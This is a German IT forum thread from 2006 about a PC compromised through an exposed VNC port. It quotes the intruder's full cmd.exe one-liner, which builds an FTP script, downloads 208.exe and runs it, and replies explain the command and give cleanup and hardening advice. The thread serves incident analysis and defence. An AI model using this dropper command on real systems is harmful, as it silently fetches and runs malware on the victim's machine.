Hunduster Geschrieben 17. Dezember 2006 Geschrieben 17. Dezember 2006 Hallo Leute, ich habe heute eine knifflige Frage; ein Arbeitskollege schrieb mich gerade über ICQ an. Er hatte gestern Abend den Port für VNC für ca. 3 Stunden geöffnet und VNC auf sienem Rechner laufen lassen weil er einem Freund etwas zeigen wollte. In diesen 3 Stunden hat sich wohl jemand in seinen Rechner über diesen Port eingeschleust. Nun hat dieser Hacker einige Befehler ausgeführt welche mein Kollege noch unter ausführen stehen hatte: cmd.exe /c del i&echo open 127.0.0.1 33093 > i&echo user 1 1 >> i &echo get 208.exe >> i &echo quit >> i &ftp -n -s:i &208.exe&del i&exit dieser Code stand genau so unter Ausführen drin. Ich mein das meiste verstehen wir aber was genau kann/könnte dieser Befehl ausgeführt haben? Hat einer von euch sowas schonmal gesehen? Zitieren
hades Geschrieben 17. Dezember 2006 Geschrieben 17. Dezember 2006 Das VNC-Protokoll ansich ist ein unverschluesseltes Protokoll. D.h. ohne geeignete Sicherheitsmassnahmen wie z.B. die Nutzung von SSH (z.B. Openssh) kann das genutzte VNC-Kennwort im Klartext mitgelesen und missbraucht werden. Auch werden InstantMessenger (wie z.B. ICQ) und Chatprogramme (wie z.B. Mirc) oft als Uebertraeger von Schadsoftware missbraucht. D.h. in diesen Programmen sollten die bereitstehenden Sicherheitsfunktionen auch genutzt werden (z.B. Links und Dateiuebertragungen nur von ausgewaehlten Personen zulassen oder komplett ausschalten). Ueber die Kommandos: cmd /c - fuehrt die Eingabeaufforderung mit dem angehaengten Befehl aus del - loeschen > Ausgabeumleitung in eine Datei >> Anhaengen in eine Datei open - FTP-Befehl zum Oeffnen einer FTP-Verbindung get - FTP-Befehl zum Download einer Datei Hier scheint, dass auf dem infizierten PC ein lokaler FTP Server auf Port 33093 installiert wurde. Massnahmen: DSL- und Netzwerkverbindungen (und wo vorhanden auch zu ISDN) trennen Datensicherung Neuinstallation sichere Konfiguration: -- Keine Adminrechte fuer den taeglichen Betrieb -- Keine ungefragt zugesandten Mails anklicken -- Nicht alle Links ohne Nachdenken anklicken -- Regelmaessig Sicherheitsupdates einspielen -- Aktueller Virenscanner -- Keine Dienste unnoetig anbieten -- XPSP2 Firewall bzw. Personal Firewall einsetzen und sinnvoll konfigurieren Wenn eine Neuinstallation nicht in Frage kommt: Scannen auf Viren mit einem aktuellen Virenscanner von einem garantiert virenfreien Medium: - z.B. mit knoppicillin Scannen auf Schadsoftware/Adware: - mit HiJackThis - mit SysInternals AutoRuns - mit SysInternals ProcessExplorer - mit SpyBotSD - mit Ad-aware Scannen auf RootKits: - mit HiJackThis - mit SysInternals AutoStarts - mit SysInternals ProcessExplorer - mit SysInternals Rootkit Revealer - mit F-Secure Blacklight Allerdings kannst Du mit diesen Massnahmen nie 100%ig sicher sein. Eine Neuinstallation ist immer die technisch sauberste Loesung. Links zu den einzelnen Programmen siehe Linkliste Securityforum. Zitieren
Hunduster Geschrieben 17. Dezember 2006 Autor Geschrieben 17. Dezember 2006 Hi hades, vielen dnak für diene ausgiebige Antwort (!!!). Mein Kollege ist schon dabei das System neu auf zu spielen. Es hat uns nur interessiert was genau da nun abgegangen ist. Ich denke das war ihm nun eine Lehre mit VNC. Gut das ich RemotelyAnywhere mit Verschlüsselung nutze. Zitieren
bigredeyes Geschrieben 18. Dezember 2006 Geschrieben 18. Dezember 2006 ... Wenn eine Neuinstallation nicht in Frage kommt: Scannen auf Viren mit einem aktuellen Virenscanner von einem garantiert virenfreien Medium: - z.B. mit knoppicillin Scannen auf Schadsoftware/Adware: - mit HiJackThis - mit SysInternals AutoRuns - mit SysInternals ProcessExplorer - mit SpyBotSD - mit Ad-aware Scannen auf RootKits: - mit HiJackThis - mit SysInternals AutoStarts - mit SysInternals ProcessExplorer - mit SysInternals Rootkit Revealer - mit F-Secure Blacklight ..... [WERBUNG] Hamachi : Stay Connected [/WERBUNG] stellt sich nur die frage ob n ftp-server als virus erkannt wird? vielleicht auch mal mit irgendwelchen port-check-programmen schauen was da nun auf dem 33093 horcht oder so... bigredeyes Zitieren
Crash2001 Geschrieben 18. Dezember 2006 Geschrieben 18. Dezember 2006 Also 208.exe ist jedenfalls bekannt als ein Trojaner, der vom TrojanDownloader.Win32.Swizzor heruntergeladen wird... Zitieren
Georg_K Geschrieben 19. Dezember 2006 Geschrieben 19. Dezember 2006 Moin, dein Freund ist nicht der erste dem das passiert einem Kumpel von mir ist letztens genau das gleiche passiert. Bei ihm haben sie auch einen FTP zum laufen gebracht. Ich nutze auch VNC wie oben schon genannt mit Open SSH. Das gibt einem gleich ein viel besseres Gefühl wenn man seinem VNC Server am laufen hat. Dein Kumpel kann ja ma googlen. Es gibt zig Tutorials für VNC mit SSH. Man muss sich halt ein wenig einlesen. Viele Grüße Georg Zitieren
Empfohlene Beiträge
Dein Kommentar
Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.